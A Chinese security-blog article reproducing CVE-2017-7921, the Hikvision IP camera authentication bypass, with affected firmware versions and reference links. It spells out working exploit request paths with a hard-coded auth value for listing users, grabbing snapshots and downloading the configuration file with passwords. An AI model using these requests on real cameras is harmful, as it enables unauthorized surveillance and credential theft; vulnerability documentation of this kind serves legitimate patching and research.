> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s?\_\_biz=MzI2ODU2MjM0OA==&mid=2247488047&idx=1&sn=ed12d03adc1a34ed7ad451f787d73466&chksm=eaece8ecdd9b61fa41cc59de0443efc9c0761dcfd941e097f33b35d8f721eda050f970e697db&mpshare=1&scene=1&srcid=1013kK5pI1H7Z8y07U39kxKE&sharer\_sharetime=1602548639830&sharer\_shareid=c051b65ce1b8b68c6869c6345bc45da1&key=d1b2c53fcb9e77ee8e3cc82883a781d348e8611a29467272f6a7b54efe085d2f72a868283276242059a72a4af6800eda9ddf543082fbc9709d860c25e0b345d4d7b965b64c2d4ee4ccc863192b5822326093434928b532f26d0a071c13eb24ea56cae89da28609416ba5ff9cee87f0d286317432234ca10be4283f849ebe9486&ascene=1&uin=ODk4MDE0MDEy&devicetype=Windows+10+x64&version=6300002f&lang=zh\_CN&exportkey=AY%2F1PaAAG9yvVXBuY3xLlJg%3D&pass\_ticket=2G6SwO4uyYCX4aTiQDJvW1D1IrAJXn1CnpH%2BbX1rykSOMZNKPaotYwa2vyHnTBud&wx\_header=0)
文章源自【字节脉搏社区】- 字节脉搏实验室
作者 - Beginner
扫描下方二维码进入社区:
0x01 CVE-2017-7921 漏洞复现
许多 HikvisionIP 摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
0x02 漏洞复现:
利用 Goby 发现漏洞(CVE-2017-7921):
利用路径:/Security/users?auth=YWRtaW46MTEK
附:检索所有用户及其角色的列表
利用路径:/onvif-http/snapshot?auth=YWRtaW46MTEK
附:获取相机快照而不进行身份验证
利用路径:
/System/configurationFile?auth=YWRtaW46MTEK
附:下载摄像头配置账号密码文件
0x03 漏洞影响版本:
HikvisionDS-2CD2xx2F-ISeries5.2.0build140721
**版本至 5.4.0build160530 版本;
**
DS-2CD2xx0F-ISeries5.2.0build140721
版本至 5.4.0Build160401 版本;
DS-2CD2xx2FWDSeries5.3.1build150410
版本至 5.4.4Build161125 版本;
DS-2CD4x2xFWDSeries5.2.0build140721
版本至 5.4.0Build160414 版本;
DS-2CD4xx5Series5.2.0build140721
版本至 5.4.0Build160421 版本;
DS-2DFxSeries5.2.0build140805
版本至 5.4.5Build160928 版本;
DS-2CD63xxSeries5.0.9build140305
版本至 5.3.5Build160106 版本
0x04 参考链接:
**https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html
**
https://www.seebug.org/vuldb/ssvid-96469
通知!
公众号招募文章投稿小伙伴啦!只要你有技术有想法要分享给更多的朋友,就可以参与到我们的投稿计划当中哦~ 感兴趣的朋友公众号首页菜单栏点击【商务合作 - 我要投稿】即可。期待大家的参与~
记得扫码
关注我们